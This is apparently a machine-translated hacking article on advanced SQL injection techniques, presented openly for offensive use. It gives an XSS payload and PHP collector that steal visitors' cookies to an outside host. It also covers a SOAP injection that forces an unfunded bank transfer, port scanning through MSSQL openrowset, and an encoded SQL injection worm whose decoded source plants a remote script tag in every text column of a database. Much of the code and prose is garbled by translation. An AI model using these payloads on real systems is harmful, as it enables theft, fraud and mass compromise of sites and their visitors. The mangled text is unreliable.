Exploration of SQL injection attacks and deep attacks

Author: evilboy)
0x01 internal mechanisms of SQL injection attacks

SQL injection attacks have been around for a long time, causing harm to many websites and seem to be continuing. The attack methods of SQL Injection in China seem to have been quite mature. For example, some large websites basically defend against SQL injection attacks, as if the attack and defense are in balance, how to break through this balance is a good topic. It should match the black anti-DDoS slogan to find a breakthrough in the confrontation between attack and defense. In this article, we will mainly discuss some in-depth SQL attack technologies and some artistic injection technologies.

The essence of SQL injection is my personal summary. The essence of SQL injection is database operations beyond authorization. At the same time, I personally think that SQL injection is not limited to WEB systems, but may also exist with software and other systems. A common WEB-based SQL injection attack is to obtain information and conduct malicious attacks through malicious WEB operations. This class is only discussed here.

The core of our discussion is how to implement SQL injection or how to exert its value more effectively. First of all, we must have a good understanding of the specific database to make full use of its functions, not just the limitations and simplicity of and 1 = 1 and 1 = 2. understanding the database is quite necessary. Otherwise, it will always be limited to other attacks.

Next we will introduce several uncommon attack methods to fully understand their meanings and help us better utilize the art of SQL injection.

0x02 instance tips SQL Injection advanced attack methods

The following are some of the special SQL Injection Attack technologies I have seen. Due to the length of the article, I would like to explain the following. For more details, I hope to build a similar project, to fully summarize and learn the experience.

SQL Injection-XSS attacks

This type of attack is called XFS in foreign countries. When javascript is used for char () and imported into SQL statements, an error will cause parsing of characters in char and executing xss code. Of course, such attacks have certain limitations, but they can still be used well.

<SCRIPT> alert (xss) </script>: This is an xss code that pops up xss. First, we need to convert it to char, and then bring it into the SQL Injection statement.
The converted characters are as follows:
ASCII: 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 47 115 99 114 105 112 62
Then, we bring it into the SQL statement, so that the xss code pops up after the user clicks it. Of course, this is just an introduction. You can use it more evil. For example, stealing cookies and Trojans. Use the following cookie collection code:
<SCRIPT> location. href = http://www.yoursite.com/cookie.php? # Cookie = + escape (document. cookie) </SCRIPT>
<? Php
$ Cookies = $ _ GET ["cookie"];
If ($ cookies)
{
$ Grab = fopen ("grab.txt", "");
Fputs ($ grab, $ cookies ."");
Fclose ($ grab );
}
?>
The XFS test code environment is as follows:
Http://www.test.com/test.php? Id = null + union + select + 1, 97,108,101,114,116, 120,115,115, char (114,105,112,116, 62 --

SOAP Injection
Simple Object Access Protocol (SOAP) is a lightweight, simple, XML-based protocol designed to exchange structured and solidified information on the WEB. SOAP can be used in combination with many existing Internet protocols and formats, including Hypertext Transfer Protocol (HTTP), Simple Mail Transfer Protocol (SMTP), and multi-purpose Internet Mail Extension protocol (MIME ). It also supports a large number of applications from the message system to Remote Process calling (RPC. Here we will not waste any ink. You can use Baidu. On the surface, it does not belong to SQL injection, but it is an interesting attack. Including XML insertion XSS attacks.

Inject soap into a bank program POST/transfer. asp HTTP/1.0 Host: wahh-bank.com Content-Length: 65 FromAccount = 18281008 & Amount = 1430 & ToAccount = 0844766 & Submit = Submit when processing this request, the application transmits the following soap message in the backend component <soap: Envelope xmlns = http://www.w3.org/2001/12/soap-envelope> <soap: body> <Account> <FromAccount> 18281008 </FromAccount> <Amount> 1430 </Amount> <ClearedFunds> False </ClearFunds> <ToAccount> 0844766 </ToAccount> </Account> </soap: body> </soap: Envelope> when the application logic determines that there is not enough funds to transfer, set the element ClearedFunds to false, therefore, the component receiving the soap message will reject the transfer. If the application processes the first CleraFunds element it encounters, the POST/transfer can be successfully transferred even if the account does not have sufficient funds. asp HTTP/1.0 Host: wahh-bank.com Content-Length: 65 FromAccount = 18281008 & Amount = 1430 </Amount> <ClearedFunds> True </ClearedFunds> <Amount> 1430 & ToAccount = 0844766 & Submit = Submit

<Soap: Envelope xmlns = http://www.w3.org/2001/12/soap-envelope> <soap: body> <Account> <FromAccount> 18281008 </FromAccount> <Amount> 1430 </Amount> <ClearedFunds> True </ClearedFunds> <Amount> 1430 </Amount> <ClearedFunds> false </ClearFunds> <ToAccount> 0844766 </ToAccount> </Account> </soap: body> </soap: Envelope>

In this way, the first ClearedFunds is set to TRUE, resulting in successful transfer. Combined with an online example.
XML-based injection technology seems to be used by many people. I have never heard of other people. I am so ignorant.

3. SQL Injection for port scanning

We can scan an IP address or CIDR Block through an SQL injection vulnerability. Of course, this attack is mainly caused by SQL server databases.
Example: asp? Id = 1 "target = _ blank>Http://www.example.com/news.asp? Id = 1Union select * from openrowset (SQLoledb, uid = sa; pwd =; Network = DBMSSOCN; Address = 10.10.10.12, 80; timeout = 5, select * from table )--
If port 80 of 10.10.10.12 is successfully connected:
"General network error. Check your network documentation" or "ole db provider sqloledb reported an error. The provider did not give any information about the error ."
Connection error. SQL Server does not exist or access denied is displayed.

SQL Injection Worm

Through SQL injection, we can implement worms and insert malicious code into each page, which is evil and applicable to SQL Server.

Example:
; DECLARE % 20 @ S % 20 NVARCHAR (4000); SET % 20 @ S = CAST (Broadcast
Bytes

005200450020005400610062006C0065005F004300
Bytes

7400200061002E006E0061006D0065002C0062002E006E
Bytes

2C0073007900730063006F006C0075006D006E0073002000
Bytes

061002E00780074007900700065003D0027007500270020
Bytes

780074007900700065003D003300350020006F0072002000
Bytes

3D003100AS % 20 NVARCHAR (4000); EXEC (@ S );--
Decode: the source code is as follows:

DECLARE @ t varchar (255)
DECLARE @ c varchar (255)

DECLARE Table_Cursor CURSOR
SELECT [A]. [Name], [B]. [Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A]. [ID] = [B]. [ID] AND

[A]. [XType] = U/* Table (User-Defined) */AND
([B]. [XType] = 99/* NTEXT */OR
[B]. [XType] = 35/* TEXT */OR
[B]. [XType] = 231/* SYSNAME */OR
[B]. [XType] = 167/* VARCHAR */)

OPEN Table_Cursor
Fetch next from Table_Cursor INTO @ T, @ C

WHILE (@ FETCH_STATUS = 0)

BEGIN
EXEC (UPDATE [+ @ T +] SET [+ @ C +] = RTRIM (CONVERT (VARCHAR, [++ @ C +]) + <script src = "http://www.fengnima.cn/k.js"> </script>)
Fetch next from Table_Cursor INTO @ T, @ C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor
A small program.

Search box Injection Technology

Search box injection is a simple sublimation of basic SQL injection. In some cases, it can also be implemented. It depends on how you inject it.